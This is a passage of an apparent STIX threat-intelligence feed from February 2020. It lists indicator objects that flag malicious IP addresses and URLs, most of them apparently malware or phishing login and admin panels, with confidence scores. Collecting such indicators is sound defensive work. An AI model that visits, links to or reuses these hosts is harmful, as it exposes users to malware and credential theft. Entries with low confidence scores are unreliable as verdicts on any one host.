CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 147.139.139.206","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '147.139.139.206']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} +{"created":"2020-02-10T02:01:30.459Z","description":"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--07925c70-b345-4aa6-8f40-e19602cf0429","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:01:30.459Z","name":"mal_url: http://pentestblog.xyz/panel/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/panel/login/']","type":"indicator","valid_from":"2020-02-10T02:01:30.459Z"} +{"created":"2020-02-10T02:01:36.571Z","description":"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--00195f28-4745-41a3-9710-7e2266b1270e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-10T02:01:36.571Z","name":"mal_url: http://f0386817.xsph.ru/32cd6120/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']","type":"indicator","valid_from":"2020-02-10T02:01:36.571Z"} +{"created":"2020-02-10T02:01:36.621Z","description":"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:01:36.621Z","name":"mal_url: http://f0395086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395086.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:01:36.621Z"} +{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://45.76.237.80/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.76.237.80/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} +{"created":"2020-02-10T02:02:14.887Z","description":"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-10T02:02:14.887Z","name":"mal_url: http://worldatdoor.in/wire/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:14.887Z"} +{"created":"2020-02-10T02:02:16.263Z","description":"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-10T02:02:16.263Z","name":"mal_url: http://wwe23pro.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wwe23pro.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-10T02:02:16.263Z"} +{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 2.59.117.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.59.117.6']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} +{"created":"2020-02-10T02:02:45.419Z","description":"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-10T02:02:45.419Z","name":"mal_url: http://garex.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://garex.xyz/login']","type":"indicator","valid_from":"2020-02-10T02:02:45.419Z"} +{"created":"2020-02-10T02:02:47.096Z","description":"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--05509090-9cd9-43b0-892c-02318134a893","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-10T02:02:47.096Z","name":"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:47.096Z"} +{"created":"2020-02-10T02:02:55.786Z","description":"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c884bffa-1248-483b-bdf8-dada05340ea4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-10T02:02:55.786Z","name":"mal_url: http://f0396079.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396079.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:02:55.786Z"} +{"created":"2020-02-10T02:03:03.62Z","description":"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:03:03.62Z","name":"mal_url: http://impulsefittness.info/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://impulsefittness.info/webpanel/login.php']","type":"indicator","valid_from":"2020-02-10T02:03:03.62Z"} +{"created":"2020-02-10T02:03:53.711Z","description":"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:03:53.711Z","name":"mal_url: http://pentestblog.xyz/csc/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/csc/index.php']","type":"indicator","valid_from":"2020-02-10T02:03:53.711Z"} +{"created":"2020-02-10T02:03:57.56Z","description":"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:03:57.56Z","name":"mal_url: http://pom4ekk.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pom4ekk.myjino.ru/login']","type":"indicator","valid_from":"2020-02-10T02:03:57.56Z"} +{"created":"2020-02-10T02:04:24.419Z","description":"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--14393248-efcc-4446-9c71-c24b8ea653ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:04:24.419Z","name":"mal_url: http://f0396384.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396384.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:04:24.419Z"} +{"created":"2020-02-10T02:04:39.273Z","description":"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-10T02:04:39.273Z","name":"mal_url: http://f0391247.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391247.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:04:39.273Z"} +{"created":"2020-02-11T02:05:59.738Z","description":"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--8aed750b-7bc5-41be-956d-5c27ba956957","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:05:59.738Z","name":"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']","type":"indicator","valid_from":"2020-02-11T02:05:59.738Z"} +{"created":"2020-02-11T02:06:33.437Z","description":"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--939b7b32-9004-40e0-8c48-77b9452a0902","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:06:33.437Z","name":"mal_url: http://borrdrillling.com/fox/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/fox/']","type":"indicator","valid_from":"2020-02-11T02:06:33.437Z"} +{"created":"2020-02-11T02:06:48.532Z","description":"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:06:48.532Z","name":"mal_url: http://borrdrillling.com/benz/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']","type":"indicator","valid_from":"2020-02-11T02:06:48.532Z"} +{"created":"2020-02-11T02:07:49.317Z","description":"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.317Z","name":"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.317Z"} +{"created":"2020-02-11T02:07:49.341Z","description":"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--336d437c-cb0b-473c-b157-3edad63d3a65","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.341Z","name":"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.341Z"} +{"created":"2020-02-12T02:02:34.926Z","description":"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--1fff5727-69fd-4477-a610-3542e53642ae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-12T02:02:34.926Z","name":"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-12T02:02:34.926Z"} +{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://188.227.85.53/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.227.85.53/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"} +{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 111.90.142.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '111.90.142.42']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"} +{"created":"2020-02-13T02:02:52.653Z","description":"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--948a3e06-3481-4873-94e7-8ab068284aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-13T02:02:52.653Z","name":"mal_url: http://felicombo.club/Zebra/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://felicombo.club/Zebra/admin.php']","type":"indicator","valid_from":"2020-02-13T02:02:52.653Z"} +{"created":"2020-02-13T02:03:16.624Z","description":"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--3b3faeec-4f78-41f2-acd8-13090336f058","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-13T02:03:16.624Z","name":"mal_url: http://pdocxoffice.com/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pdocxoffice.com/Panel/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:16.624Z"} +{"created":"2020-02-13T02:03:36.577Z","description":"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-13T02:03:36.577Z","name":"mal_url: http://megaeditores.com/fgv/PHP/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']","type":"indicator","valid_from":"2020-02-13T02:03:36.577Z"} +{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"} +{"created":"2020-02-20T04:06:53.787Z","description":"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:06:53.787Z","name":"mal_url: http://hotlips.top/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hotlips.top/login']","type":"indicator","valid_from":"2020-02-20T04:06:53.787Z"} +{"created":"2020-02-20T04:08:45.548Z","description":"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-20T04:08:45.548Z","name":"mal_url: http://aflamdirectory.com/wp-content/ip/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']","type":"indicator","valid_from":"2020-02-20T04:08:45.548Z"} +{"created":"2020-02-20T04:08:45.601Z","description":"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T04:08:45.601Z","name":"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:08:45.601Z"} +{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 5.188.9.33","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.9.33']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"} +{"created":"2020-02-20T04:11:00.455Z","description":"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8203935f-fb3f-418c-945d-40fca5ef088d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T04:11:00.455Z","name":"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:11:00.455Z"} +{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: http://5.8.88.27/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.27/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"} +{"created":"2020-02-20T04:28:36.172Z","description":"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.172Z","name":"mal_url: http://23.247.102.18/4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/4/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.172Z"} +{"created":"2020-02-20T04:28:36.19Z","description":"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.19Z","name":"mal_url: http://23.247.102.18/6/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/6/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.19Z"} +{"created":"2020-02-20T04:30:25.248Z","description":"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-20T04:30:25.248Z","name":"mal_url: http://f0400035.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400035.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T04:30:25.248Z"} +{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 217.8.117.22","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.22']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"} +{"created":"2020-02-20T04:31:26.532Z","description":"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.532Z","name":"mal_url: http://23.247.102.18/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.532Z"} +{"created":"2020-02-20T04:31:26.582Z","description":"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--f43a4d56-b27f-41f0-917b-52358df31e13","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.582Z","name":"mal_url: http://23.247.102.18/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.582Z"} +{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 5.8.88.35","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.8.88.35']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"} +{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 2.57.91.231","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.91.231']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"} +{"created":"2020-02-20T04:32:52.057Z","description":"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:32:52.057Z","name":"mal_url: http://lae9ac50.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.057Z"} +{"created":"2020-02-20T04:32:52.074Z","description":"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f4447d70-3217-4319-9b89-4439db608f67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-20T04:32:52.074Z","name":"mal_url: http://ld01c555.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld01c555.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.074Z"} +{"created":"2020-02-20T04:49:13.452Z","description":"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--93e03851-428e-4e25-9fa6-17383426a6d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:49:13.452Z","name":"mal_url: http://borrdrillling.com/psm91/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:49:13.452Z"} +{"created":"2020-02-20T04:49:22.233Z","description":"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:49:22.233Z","name":"mal_url: http://wtfshop.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wtfshop.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:49:22.233Z"} +{"created":"2020-02-20T04:50:21.678Z","description":"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:50:21.678Z","name":"mal_url: http://minecrafttusa1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://minecrafttusa1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:50:21.678Z"} +{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 141.8.194.74","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '141.8.194.74']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"} +{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 47.252.11.134","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.252.11.134']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"} +{"created":"2020-02-20T04:51:08.292Z","description":"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-20T04:51:08.292Z","name":"mal_url: http://amazon-fr.fun/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amazon-fr.fun/admin/']","type":"indicator","valid_from":"2020-02-20T04:51:08.292Z"} +{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: 